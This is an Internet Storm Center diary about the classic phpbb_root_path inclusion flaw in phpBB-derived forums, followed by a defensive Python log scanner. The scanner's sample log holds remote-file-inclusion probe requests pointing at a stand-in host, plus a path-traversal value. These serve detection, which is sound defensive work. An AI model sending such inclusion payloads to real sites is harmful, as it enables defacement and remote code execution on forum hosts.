
SANS ISC: Classic phpBB vulnerability impacts phpBB-based forums - SANS Internet Storm Center SANS ISC InfoSec Forums

Classic phpBB vulnerability impacts phpBB-based forums
It seems fairly obvious, but the classic phpbb_root_path vulnerability is present in products such as Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB and Xero Portal. All are affected by the vulnerability, which is exposed when register_globals is set to "on". It also appears to be regularly exploited to deface systems.
Thanks for the lead Juergen!
Kevin Liston

ISC Handler
Feb 2nd 2007
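
With register_globals on, PHP registers request parameters as global variables, so a request can overwrite phpbb_root_path, a variable these code bases set themselves and that a legitimate client never needs to send. The following added example (not part of the original diary; the log lines, hosts and script names are constructed) flags every logged request that supplies that parameter. It only sees query strings, so values sent in POST bodies or cookies are out of its reach.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (common log format); script names are hypothetical.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Feb/2007:10:00:01 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Feb/2007:10:00:05 +0000] "GET /forum/includes/example.php?phpbb_root_path=http://host.invalid/a.txt HTTP/1.0" 200 312',
    '198.51.100.7 - - [02/Feb/2007:10:00:06 +0000] "GET /portal/includes/example.php?phpbb%5Froot%5Fpath=http%3A%2F%2Fhost.invalid%2Fa.txt HTTP/1.0" 404 210',
    '203.0.113.5 - - [02/Feb/2007:10:02:11 +0000] "GET /board/includes/example.php?id=1&phpbb.root.path=../../ HTTP/1.1" 200 100',
    '192.0.2.10 - - [02/Feb/2007:10:03:00 +0000] "GET /forum/search.php?keywords=phpbb_root_path HTTP/1.1" 200 900',
]

# client, request target and status from a common/combined log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# value starts with "scheme:" (http, ftp, php, data, ...) or a protocol-relative "//"
SCHEME_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//)', re.I)

def php_var_name(key):
    """Name PHP registers for a request key: array suffix dropped, dots/spaces -> '_'."""
    return re.sub(r'[ .]', '_', key.split('[', 1)[0])

def classify(value):
    """Rough triage of a client-supplied phpbb_root_path value."""
    if SCHEME_RE.match(value):
        return 'url-or-wrapper'
    if '..' in value or value.startswith('/'):
        return 'local-path'
    return 'overridden'

def scan(lines):
    """Return (line_no, client, script, kind, status) per request setting phpbb_root_path."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes keys and values once, as PHP does
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if php_var_name(key) == 'phpbb_root_path':
                findings.append((line_no, client, parts.path, classify(value), int(status)))
    return findings

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 means the targeted script exists and ran, so that host should be checked first; a 404 is a probe against a path that is not there.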
